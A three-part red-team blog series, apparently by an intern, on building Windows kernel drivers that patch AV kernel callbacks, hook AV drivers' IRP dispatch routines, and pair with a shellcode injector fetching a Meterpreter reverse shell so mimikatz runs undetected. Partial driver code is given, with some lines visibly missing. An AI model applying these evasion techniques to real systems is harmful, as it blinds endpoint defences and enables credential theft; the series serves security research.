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Kernel Karnage – Part 3 (Challenge Accepted)

By: bautersj

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

WinObj GLOBALS?? directory listing

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, which will also look at image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good -although easy to detect- way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys –> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
	    return CompleteRequest(Irp, status, 0);
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
    return CompleteRequest(Irp, status, 0);
void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
	for (int i = 0; i < MaxIntercept; i++) {
		if (globals.Drivers[i].DriverObject == DriverObject) {
			if (globals.Drivers[i].DriverUnload) {

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck, mimikatz.exe was still detected and blocked. This got me thinking, running such a well-known malicious binary without any attempts to hide it or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I chose for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load-, registry- and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 2 (Back to Basics)

By: bautersj

This week I try to figure out “what makes a driver a driver?” and experiment with writing my own kernel hooks.

1. Windows Kernel Programming 101

In the first part of this internship blog series, we took a look at how EDRs interact with User and Kernel space, and explored a frequently used feature called Kernel Callbacks by leveraging the Windows Kernel Ps Callback Experiments project by @fdiskyou to patch them in memory. Kernel callbacks are only the first step in a line of defense that modern EDR and AV solutions leverage when deploying kernel drivers to identify malicious activity. To better understand what we’re up against, we need to take a step back and familiarize ourselves with the concept of a driver itself.

To do just that, I spent the vast majority of my time this week reading the fantastic book Windows Kernel Programming by Pavel Yosifovich, which is a great introduction to the Windows kernel and its components and mechanisms, as well as drivers and their anatomy and functions.

In this blogpost I would like to take a closer look at the anatomy of a driver and experiment with a different technique called IRP MajorFunction hooking.

2. Anatomy of a driver

Most of us are familiar with the classic C/C++ projects and their characteristics; for example, the int main(int argc, char* argv[]){ return 0; } function, which is the typical entry point of a C++ console application. So, what makes a driver a driver?

Just like a C++ console application, a driver requires an entry point as well. This entry point comes in the form of a DriverEntry() function with the prototype:

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath);

The DriverEntry() function is responsible for 2 major tasks:

  1. setting up the driver’s DeviceObject and associated symbolic link
  2. setting up the dispatch routines

Every driver needs an “endpoint” that other applications can use to communicate with. This comes in the form of a DeviceObject, an instance of the DEVICE_OBJECT structure. The DeviceObject is abstracted in the form of a symbolic link and registered in the Object Manager’s GLOBAL?? directory (use sysinternal’s WinObj tool to view the Object Manager). User mode applications can use functions like NtCreateFile with the symbolic link as a handle to talk to the driver.


Example of a C++ application using CreateFile to talk to a driver registered as “Interceptor” (hint: it’s my driver 😉 ):

HANDLE hDevice = CreateFile(L"\\\\.\\Interceptor)", GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);

Once the driver’s endpoint is configured, the DriverEntry() function needs to sort out what to do with incoming communications from user mode and other operations such as unloading itself. To do this, it uses the DriverObject to register Dispatch Routines, or functions associated with a particular driver operation.

The DriverObject contains an array, holding function pointers, called the MajorFunction array. This array determines which particular operations are supported by the driver, such as Create, Read, Write, etc. The index of the MajorFunction array is controlled by Major Function codes, defined by their IRP_MJ_ prefix.

There are 3 main Major Function codes along side the DriverUnload operation which need initializing for the driver to function properly:

// prototypes
void InterceptUnload(PDRIVER_OBJECT);

extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    DriverObject->DriverUnload = InterceptUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =  InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = InterceptDeviceControl;


The DriverObject->DriverUnload dispatch routine is responsible for cleaning up and preventing any memory leaks before the driver unloads. A leak in the kernel will persist until the machine is rebooted. The IRP_MJ_CREATE and IRP_MJ_CLOSE Major Functions handle CreateFile() and CloseHandle() calls. Without them, handles to the driver wouldn’t be able to be created or destroyed, so in a way the driver would be unusable. Finally, the IRP_MJ_DEVICE_CONTROL Major Function is in charge of I/O operations/communications.

A typical driver communicates by receiving requests, handling those requests or forwarding them to the appropriate device in the device stack (out of scope for this blogpost). These requests come in the form of an I/O Request Packet or IRP, which is a semi-documented structure, accompanied by one or more IO_STACK_LOCATION structures, located in memory directly following the IRP. Each IO_STACK_LOCATION is related to a device in the device stack and the driver can call the IoGetCurrentIrpStackLocation() function to retrieve the IO_STACK_LOCATION related to itself.

The previously mentioned dispatch routines determine how these IRPs are handled by the driver. We are interested in the IRP_MJ_DEVICE_CONTROL dispatch routine, which corresponds to the DeviceIoControl() call from user mode or ZwDeviceIoControlFile() call from kernel mode. An IRP request destined for IRP_MJ_DEVICE_CONTROL contains two user buffers, one for reading and one for writing, as well as a control code indicated by the IOCTL_ prefix. These control codes are defined by the driver developer and indicate the supported actions.

Control codes are built using the CTL_CODE macro, defined as:

#define CTL_CODE(DeviceType, Function, Method, Access)((DeviceType) << 16 | ((Access) << 14) | ((Function) << 2) | (Method))

Example for my Interceptor driver:


3. Kernel land hooks

Now that we have a vague idea how drivers communicate with other drivers and applications, we can think about ways to intercept those communications. One of these techniques is called IRP MajorFunction hooking.

hook MFA

Since drivers and all other kernel processes share the same memory, we can also access and overwrite that memory as long as we don’t upset PatchGuard by modifying critical structures. I wrote a driver called Interceptor, which does exactly that. It locates the target driver’s DriverObject and retrieves its MajorFunction array (MFA). This is done using the undocumented ObReferenceObjectByName() function, which uses the driver device name to get a pointer to the DriverObject.

UNICODE_STRING targetDriverName = RTL_CONSTANT_STRING(L"\\Driver\\Disk");
PDRIVER_OBJECT DriverObject = nullptr;

status = ObReferenceObjectByName(

if (!NT_SUCCESS(status)) {
	KdPrint((DRIVER_PREFIX "failed to obtain DriverObject (0x%08X)\n", status));
	return status;

Once it has obtained the MFA, it will iterate over all the Dispatch Routines (IRP_MJ_) and replace the pointers, which are pointing to the target driver’s functions (0x1000 – 0x1003), with my own pointers, pointing to the *InterceptHook functions (0x2000 – 0x2003), controlled by the Interceptor driver.

for (int i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) {
    //save the original pointer in case we need to restore it later
	globals.originalDispatchFunctionArray[i] = DriverObject->MajorFunction[i];
    //replace the pointer with our own pointer
	DriverObject->MajorFunction[i] = &GenericHook;

As an example, I hooked the disk driver’s IRP_MJ_DEVICE_CONTROL dispatch routine and intercepted the calls:

Hooked IRP Disk Driver

This method can be used to intercept communications to any driver but is fairly easy to detect. A driver controlled by EDR/AV could iterate over its own MajorFunction array and check the function pointer’s address to see if it is located in its own address range. If the function pointer is located outside its own address range, that means the dispatch routine was hooked.

4. Conclusion

To defeat EDRs in kernel space, it is important to know what goes on at the core, namely the driver. In this blogpost we examined the anatomy of a driver, its functions, and their main responsibilities. We established that a driver needs to communicate with other drivers and applications in user space, which it does via dispatch routines registered in the driver’s MajorFunction array.

We then briefly looked at how we can intercept these communications by using a technique called IRP MajorFunction hooking, which patches the target driver’s dispatch routines in memory with pointers to our own functions, so we can inspect or redirect traffic.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 1

By: bautersj

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi.dll,... and all the user processes and applications. When applications or processes need more advanced access or control to hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (x64-bit), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64-bit edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Window kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately Bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.


3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware, there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to a EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft made an end to patching SSDT in x64-bit versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straight forward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

; evil.inf

Signature="$WINDOWS NT$"

DefaultDestDir = 12

1 = %DiskName%,,,""




ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
DiskName="evil Source Disk"

Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.


Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.


Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.


Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and

The driver roughly follows the same method to locate the callback array in memory; by calculating offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop though the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;


	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
			OffsetAddr = 0;

            //copy 4 bytes after LEA, r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //return the relative offset to the callback array
			return OffsetAddr + 7 + i;

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where OPCODE_*[g_WindowsIndex] are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumer).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.
